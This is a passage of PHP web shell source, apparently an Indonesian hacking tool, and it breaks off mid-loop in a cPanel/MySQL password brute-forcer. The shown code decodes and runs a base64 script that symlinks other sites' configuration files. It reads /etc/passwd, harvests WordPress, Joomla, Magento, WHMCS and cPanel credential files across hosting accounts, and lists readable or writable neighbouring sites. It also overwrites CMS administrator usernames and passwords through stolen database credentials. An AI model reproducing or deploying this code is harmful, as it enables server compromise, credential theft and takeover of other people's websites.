vJy4kc2l0ZXNzLicvaHR0cGRvY3MvaW5jbHVkZXMvZGlzdC1jb25maWd1cmUucGhwJywkc2l0ZXNzLictemVuY2FydC50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvemVuY2FydC9pbmNsdWRlcy9kaXN0LWNvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1zaG9wLXplbmNhcnQudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Nob3AvaW5jbHVkZXMvZGlzdC1jb25maWd1cmUucGhwJywkc2l0ZXNzLictc2hvcC1aQ3Nob3AudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZi50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc21mL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZjIudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2ZvcnVtL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZi1mb3J1bS50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvZm9ydW1zL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZi1mb3J1bXMudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3VwbG9hZC9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdXAudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYXJ0aWNsZS9jb25maWcucGhwJywkc2l0ZXNzLictTndhaHkudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3VwL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRzaXRlc3MuJy11cDIudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZl9nbG9iYWwucGhwJywkc2l0ZXNzLictNi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9pbmNsdWRlL2RiLnBocCcsJHNpdGVzcy4nLTcudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29ubmVjdC5waHAnLCRzaXRlc3MuJy1QSFAtRnVzaW9uLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL21rX2NvbmYucGhwJywkc2l0ZXNzLictOS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jb25maWcucGhwJywkc2l0ZXNzLictNGltYWdlcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaXRlcy9kZWZhdWx0L3NldHRpbmdzLnBocCcsJHNpdGVzcy4nLURydXBhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tZW1iZXIvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy0xbWVtYmVyLnR4dCcpIDsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYmlsbGluZ3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1iaWxsaW5ncy50eHQnKSA7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwb3J0cy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXN1cHBvcnRzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3JlcXVpcmVzL2NvbmZpZy5waHAnLCRzaXRlc3MuJy1BTTRTUy1ob3N0aW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3N1cHBvcnRzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLXN1cHBvcnRzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NsaWVudC9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1jbGllbnQudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc3VwcG9ydC9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1zdXBwb3J0LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2JpbGxpbmcvaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtYmlsbGluZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9iaWxsaW5ncy9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1iaWxsaW5ncy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ob3N0L2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWhvc3QudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaG9zdHMvaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtaG9zdHMudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaG9zdGluZy9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1ob3N0aW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RpbmdzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWhvc3RpbmdzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RiaWxsaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtaG9zdGJpbGxzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWhvc3RiaWxsLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FwcC9ldGMvbG9jYWwueG1sJywkc2l0ZXNzLictTWFnZW50by50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hZG1pbi9jb25maWcucGhwJywkc2l0ZXNzLictT3BlbmNhcnQudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZmlnL3NldHRpbmdzLmluYy5waHAnLCRzaXRlc3MuJy1QcmVzdGFzaG9wLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NvbmZpZy9rb25la3NpLnBocCcsJHNpdGVzcy4nLUxva29tZWRpYS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9sb2tvbWVkaWEvY29uZmlnL2tvbmVrc2kucGhwJywkc2l0ZXNzLictTG9rb21lZGlhLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3NsY29uZmlnLnBocCcsJHNpdGVzcy4nLVNpdGVsb2NrLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FwcGxpY2F0aW9uL2NvbmZpZy9kYXRhYmFzZS5waHAnLCRzaXRlc3MuJy1FbGxpc2xhYi50eHQnKTsNCn0NCnByaW50ICJMb2NhdGlvbjogLi9cblxuIjs=";
  1942.         $file = "human_config/vhost.cin";
  1943.         $handle = fopen($file ,"w+");
  1944.         fwrite($handle ,base64_decode($vhost));
  1945.         fclose($handle);
  1946.         chmod($file, 0755);
  1947.         if(exe("cd human_config && ./vhost.cin")) {
  1948.             echo "<center><a href='$link_config/human_config'><font color=cyan>Done</font></a></center>";
  1949.         } else {
  1950.             echo "<center><a href='$link_config/human_config/vhost.cin'><font color=cyan>Done</font></a></center>";
  1951.         }
  1952.  
  1953.     } else {
  1954.         $etc = fopen("/etc/passwd", "r") or die("<pre><font color=red>Can't read /etc/passwd</font></pre>");
  1955.         while($passwd = fgets($etc)) {
  1956.             if($passwd == "" || !$etc) {
  1957.                 echo "<font color=red>Can't read /etc/passwd</font>";
  1958.             } else {
  1959.                 preg_match_all('/(.*?):x:/', $passwd, $user_config);
  1960.                 foreach($user_config[1] as $user_human) {
  1961.                     $user_config_dir = "/home/$user_human/public_html/";
  1962.                     if(is_readable($user_config_dir)) {
  1963.                         $grab_config = array(
  1964.                             "/home/$user_human/.my.cnf" => "cpanel",
  1965.                             "/home/$user_human/.accesshash" => "WHM-accesshash",
  1966.                             "$user_config_dir/po-content/config.php" => "Popoji",
  1967.                             "$user_config_dir/vdo_config.php" => "Voodoo",
  1968.                             "$user_config_dir/bw-configs/config.ini" => "BosWeb",
  1969.                             "$user_config_dir/config/koneksi.php" => "Lokomedia",
  1970.                             "$user_config_dir/lokomedia/config/koneksi.php" => "Lokomedia",
  1971.                             "$user_config_dir/clientarea/configuration.php" => "WHMCS",
  1972.                             "$user_config_dir/whm/configuration.php" => "WHMCS",
  1973.                             "$user_config_dir/whmcs/configuration.php" => "WHMCS",
  1974.                             "$user_config_dir/forum/config.php" => "phpBB",
  1975.                             "$user_config_dir/sites/default/settings.php" => "Drupal",
  1976.                             "$user_config_dir/config/settings.inc.php" => "PrestaShop",
  1977.                             "$user_config_dir/app/etc/local.xml" => "Magento",
  1978.                             "$user_config_dir/joomla/configuration.php" => "Joomla",
  1979.                             "$user_config_dir/configuration.php" => "Joomla",
  1980.                             "$user_config_dir/wp/wp-config.php" => "WordPress",
  1981.                             "$user_config_dir/wordpress/wp-config.php" => "WordPress",
  1982.                             "$user_config_dir/wp-config.php" => "WordPress",
  1983.                             "$user_config_dir/admin/config.php" => "OpenCart",
  1984.                             "$user_config_dir/slconfig.php" => "Sitelok",
  1985.                             "$user_config_dir/application/config/database.php" => "Ellislab");
  1986.                         foreach($grab_config as $config => $nama_config) {
  1987.                             $ambil_config = file_get_contents($config);
  1988.                             if($ambil_config == '') {
  1989.                             } else {
  1990.                                 $file_config = fopen("human_config/$user_human-$nama_config.txt","w");
  1991.                                 fputs($file_config,$ambil_config);
  1992.                             }
  1993.                         }
  1994.                     }      
  1995.                 }
  1996.             }  
  1997.         }
  1998.     echo "<div class='tersakiti' border='0' cellpadding='3' cellspacing='1' align='center'>";
  1999.     echo "<center><a href='?dir=$dir/human_config'><font color=cyan>Done</font></a></center></div>";
  2000.     }
  2001. } elseif($_GET['do'] == 'jumping') {
  2002.     $i = 0;
  2003.     echo "<div class='margin: 5px auto;'>";
  2004.     if(preg_match("/hsphere/", $dir)) {
  2005.         $urls = explode("\r\n", $_POST['url']);
  2006.         if(isset($_POST['jump'])) {
  2007.             echo "<pre>";
  2008.             foreach($urls as $url) {
  2009.                 $url = str_replace(array("http://","www."), "", strtolower($url));
  2010.                 $etc = "/etc/passwd";
  2011.                 $f = fopen($etc,"r");
  2012.                 while($gets = fgets($f)) {
  2013.                     $pecah = explode(":", $gets);
  2014.                     $user = $pecah[0];
  2015.                     $dir_user = "/hsphere/local/home/$user";
  2016.                     if(is_dir($dir_user) === true) {
  2017.                         $url_user = $dir_user."/".$url;
  2018.                         if(is_readable($url_user)) {
  2019.                             $i++;
  2020.                             $jrw = "[<font color=cyan>R</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
  2021.                             if(is_writable($url_user)) {
  2022.                                 $jrw = "[<font color=cyan>RW</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
  2023.                             }
  2024.                             echo $jrw."<br>";
  2025.                         }
  2026.                     }
  2027.                 }
  2028.             }
  2029.         if($i == 0) {
  2030.         } else {
  2031.             echo "<br>Total ada ".$i." Kamar di ".$ip;
  2032.         }
  2033.         echo "</pre>";
  2034.         } else {
  2035.                  echo '<center>
  2036.                   <form method="post">
  2037.                   List Domains: <br>
  2038.                   <textarea name="url" style="width: 500px; height: 250px;">';
  2039.             $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
  2040.             while($getss = fgets($fp)) {
  2041.                 echo $getss;
  2042.             }
  2043.             echo  '</textarea><br>
  2044.                   <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  2045.                   </form></center>';
  2046.         }
  2047.     } elseif(preg_match("/vhosts|vhost/", $dir)) {
  2048.         preg_match("/\/var\/www\/(.*?)\//", $dir, $vh);
  2049.         $urls = explode("\r\n", $_POST['url']);
  2050.         if(isset($_POST['jump'])) {
  2051.             echo "<pre>";
  2052.             foreach($urls as $url) {
  2053.                 $url = str_replace("www.", "", $url);
  2054.                 $web_vh = "/var/www/".$vh[1]."/$url/httpdocs";
  2055.                 if(is_dir($web_vh) === true) {
  2056.                     if(is_readable($web_vh)) {
  2057.                         $i++;
  2058.                         $jrw = "[<font color=cyan>R</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
  2059.                         if(is_writable($web_vh)) {
  2060.                             $jrw = "[<font color=cyan>RW</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
  2061.                         }
  2062.                         echo $jrw."<br>";
  2063.                     }
  2064.                 }
  2065.             }
  2066.         if($i == 0) {
  2067.         } else {
  2068.             echo "<br>Total ada ".$i." Kamar di ".$ip;
  2069.         }
  2070.         echo "</pre>";
  2071.         } else {
  2072.             echo '<center>
  2073.                   <form method="post">
  2074.                   List Domains: <br>
  2075.                   <textarea name="url" style="width: 500px; height: 250px;">';
  2076.                   bing("ip:$ip");
  2077.             echo  '</textarea><br>
  2078.                   <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  2079.                   </form></center>';
  2080.         }
  2081.     } else {
  2082.         echo "<pre>";
  2083.         $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>");
  2084.         while($passwd = fgets($etc)) {
  2085.             if($passwd == '' || !$etc) {
  2086.                 echo "<font color=red>Can't read /etc/passwd</font>";
  2087.             } else {
  2088.                 preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
  2089.                 foreach($user_jumping[1] as $user_human_jump) {
  2090.                     $user_jumping_dir = "/home/$user_human_jump/public_html";
  2091.                     if(is_readable($user_jumping_dir)) {
  2092.                         $i++;
  2093.                         $jrw = "[<font color=cyan>R</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  2094.                         if(is_writable($user_jumping_dir)) {
  2095.                             $jrw = "[<font color=cyan>RW</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  2096.                         }
  2097.                         echo $jrw;
  2098.                         if(function_exists('posix_getpwuid')) {
  2099.                             $domain_jump = file_get_contents("/etc/named.conf");   
  2100.                             if($domain_jump == '') {
  2101.                                 echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
  2102.                             } else {
  2103.                                 preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
  2104.                                 foreach($domains_jump[1] as $dj) {
  2105.                                     $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  2106.                                     $user_jumping_url = $user_jumping_url['name'];
  2107.                                     if($user_jumping_url == $user_human_jump) {
  2108.                                         echo " => ( <u>$dj</u> )<br>";
  2109.                                         break;
  2110.                                     }
  2111.                                 }
  2112.                             }
  2113.                         } else {
  2114.                             echo "<br>";
  2115.                         }
  2116.                     }
  2117.                 }
  2118.             }
  2119.         }
  2120.         if($i == 0) {
  2121.         } else {
  2122.             echo "<br>Total ada ".$i." Kamar di ".$ip;
  2123.         }
  2124.         echo "</pre>";
  2125.     }
  2126.     echo "</div>";
  2127. } elseif($_GET['do'] == 'auto_edit_user') {
  2128.     if($_POST['hajar']) {
  2129.         if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
  2130.             echo "username atau password harus lebih dari 6 karakter";
  2131.         } else {
  2132.             $user_baru = $_POST['user_baru'];
  2133.             $pass_baru = md5($_POST['pass_baru']);
  2134.             $conf = $_POST['config_dir'];
  2135.             $scan_conf = scandir($conf);
  2136.             foreach($scan_conf as $file_conf) {
  2137.                 if(!is_file("$conf/$file_conf")) continue;
  2138.                 $config = file_get_contents("$conf/$file_conf");
  2139.                 if(preg_match("/JConfig|joomla/",$config)) {
  2140.                     $dbhost = ambilkata($config,"host = '","'");
  2141.                     $dbuser = ambilkata($config,"user = '","'");
  2142.                     $dbpass = ambilkata($config,"password = '","'");
  2143.                     $dbname = ambilkata($config,"db = '","'");
  2144.                     $dbprefix = ambilkata($config,"dbprefix = '","'");
  2145.                     $prefix = $dbprefix."users";
  2146.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2147.                     $db = mysql_select_db($dbname);
  2148.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  2149.                     $result = mysql_fetch_array($q);
  2150.                     $id = $result['id'];
  2151.                     $site = ambilkata($config,"sitename = '","'");
  2152.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
  2153.                     echo "Config => ".$file_conf."<br>";
  2154.                     echo "CMS => Joomla<br>";
  2155.                     if($site == '') {
  2156.                        
  2157.                         echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
  2158.                     } else {
  2159.                         echo "Sitename => $site<br>";
  2160.                     }
  2161.                     if(!$update OR !$conn OR !$db) {
  2162.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  2163.                     } else {
  2164.                         echo "Status => <font color=cyan>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  2165.                     }
  2166.                     mysql_close($conn);
  2167.                 } elseif(preg_match("/WordPress/",$config)) {
  2168.                     $dbhost = ambilkata($config,"DB_HOST', '","'");
  2169.                     $dbuser = ambilkata($config,"DB_USER', '","'");
  2170.                     $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  2171.                     $dbname = ambilkata($config,"DB_NAME', '","'");
  2172.                     $dbprefix = ambilkata($config,"table_prefix  = '","'");
  2173.                     $prefix = $dbprefix."users";
  2174.                     $option = $dbprefix."options";
  2175.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2176.                     $db = mysql_select_db($dbname);
  2177.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  2178.                     $result = mysql_fetch_array($q);
  2179.                     $id = $result[ID];
  2180.                     $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  2181.                     $result2 = mysql_fetch_array($q2);
  2182.                     $target = $result2[option_value];
  2183.                     if($target == '') {
  2184.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  2185.                     } else {
  2186.                         $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
  2187.                     }
  2188.                     $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
  2189.                     echo "Config => ".$file_conf."<br>";
  2190.                     echo "CMS => Wordpress<br>";
  2191.                     echo $url_target;
  2192.                     if(!$update OR !$conn OR !$db) {
  2193.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  2194.                     } else {
  2195.                         echo "Status => <font color=cyan>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  2196.                     }
  2197.                     mysql_close($conn);
  2198.                 } elseif(preg_match("/Magento|Mage_Core/",$config)) {
  2199.                     $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
  2200.                     $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
  2201.                     $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
  2202.                     $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
  2203.                     $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
  2204.                     $prefix = $dbprefix."admin_user";
  2205.                     $option = $dbprefix."core_config_data";
  2206.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2207.                     $db = mysql_select_db($dbname);
  2208.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  2209.                     $result = mysql_fetch_array($q);
  2210.                     $id = $result[user_id];
  2211.                     $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
  2212.                     $result2 = mysql_fetch_array($q2);
  2213.                     $target = $result2[value];
  2214.                     if($target == '') {
  2215.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  2216.                     } else {
  2217.                         $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
  2218.                     }
  2219.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  2220.                     echo "Config => ".$file_conf."<br>";
  2221.                     echo "CMS => Magento<br>";
  2222.                     echo $url_target;
  2223.                     if(!$update OR !$conn OR !$db) {
  2224.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  2225.                     } else {
  2226.                         echo "Status => <font color=cyan>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  2227.                     }
  2228.                     mysql_close($conn);
  2229.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
  2230.                     $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
  2231.                     $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
  2232.                     $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
  2233.                     $dbname = ambilkata($config,"'DB_DATABASE', '","'");
  2234.                     $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
  2235.                     $prefix = $dbprefix."user";
  2236.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2237.                     $db = mysql_select_db($dbname);
  2238.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  2239.                     $result = mysql_fetch_array($q);
  2240.                     $id = $result[user_id];
  2241.                     $target = ambilkata($config,"HTTP_SERVER', '","'");
  2242.                     if($target == '') {
  2243.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  2244.                     } else {
  2245.                         $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
  2246.                     }
  2247.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  2248.                     echo "Config => ".$file_conf."<br>";
  2249.                     echo "CMS => OpenCart<br>";
  2250.                     echo $url_target;
  2251.                     if(!$update OR !$conn OR !$db) {
  2252.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  2253.                     } else {
  2254.                         echo "Status => <font color=cyan>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  2255.                     }
  2256.                     mysql_close($conn);
  2257.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
  2258.                     $dbhost = ambilkata($config,'server = "','"');
  2259.                     $dbuser = ambilkata($config,'username = "','"');
  2260.                     $dbpass = ambilkata($config,'password = "','"');
  2261.                     $dbname = ambilkata($config,'database = "','"');
  2262.                     $prefix = "users";
  2263.                     $option = "identitas";
  2264.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2265.                     $db = mysql_select_db($dbname);
  2266.                     $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
  2267.                     $result = mysql_fetch_array($q);
  2268.                     $target = $result[alamat_website];
  2269.                     if($target == '') {
  2270.                         $target2 = $result[url];
  2271.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  2272.                         if($target2 == '') {
  2273.                             $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  2274.                         } else {
  2275.                             $cek_login3 = file_get_contents("$target2/adminweb/");
  2276.                             $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
  2277.                             if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
  2278.                                 $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
  2279.                             } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
  2280.                                 $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
  2281.                             } else {
  2282.                                 $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  2283.                             }
  2284.                         }
  2285.                     } else {
  2286.                         $cek_login = file_get_contents("$target/adminweb/");
  2287.                         $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
  2288.                         if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
  2289.                             $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
  2290.                         } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
  2291.                             $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
  2292.                         } else {
  2293.                             $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  2294.                         }
  2295.                     }
  2296.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
  2297.                     echo "Config => ".$file_conf."<br>";
  2298.                     echo "CMS => Lokomedia<br>";
  2299.                     if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
  2300.                         echo $url_target2;
  2301.                     } else {
  2302.                         echo $url_target;
  2303.                     }
  2304.                     if(!$update OR !$conn OR !$db) {
  2305.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  2306.                     } else {
  2307.                         echo "Status => <font color=cyan>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  2308.                     }
  2309.                     mysql_close($conn);
  2310.                 }
  2311.             }
  2312.         }
  2313.     } else {
  2314.         echo "<div class='tersakiti' border='0' cellpadding='3' cellspacing='1' align='center'>[+] Auto Edit User Config [+]</div>";
  2315.     echo "<div class='human' border='0' cellpadding='3' cellspacing='1' align='center'>";
  2316.         echo "<center>
  2317.         <form method='post'>
  2318.         DIR Config: <br>
  2319.         <input type='text' size='50' name='config_dir' value='$dir'><br><br>
  2320.         Set User & Pass: <br>
  2321.         <input type='text' name='user_baru' value='human' placeholder='user_baru'><br>
  2322.         <input type='text' name='pass_baru' value='human' placeholder='pass_baru'><br>
  2323.         <input type='submit' name='hajar' value='Hajar!' style='width: 215px;'>
  2324.         </form>
  2325.         <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
  2326.         ";
  2327.     }
  2328. } elseif($_GET['do'] == 'cpanel') {
  2329.     if($_POST['crack']) {
  2330.         $usercp = explode("\r\n", $_POST['user_cp']);
  2331.         $passcp = explode("\r\n", $_POST['pass_cp']);
  2332.         $i = 0;
  2333.         foreach($usercp as $ucp) {
  2334.             foreach($passcp as $pcp) {
  2335.                 if(@mysql_connect('localhost', $ucp, $pcp)) {
  2336.                     if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  2337.                     } else {
  2338.                         $_SESSION[$ucp] = "1";
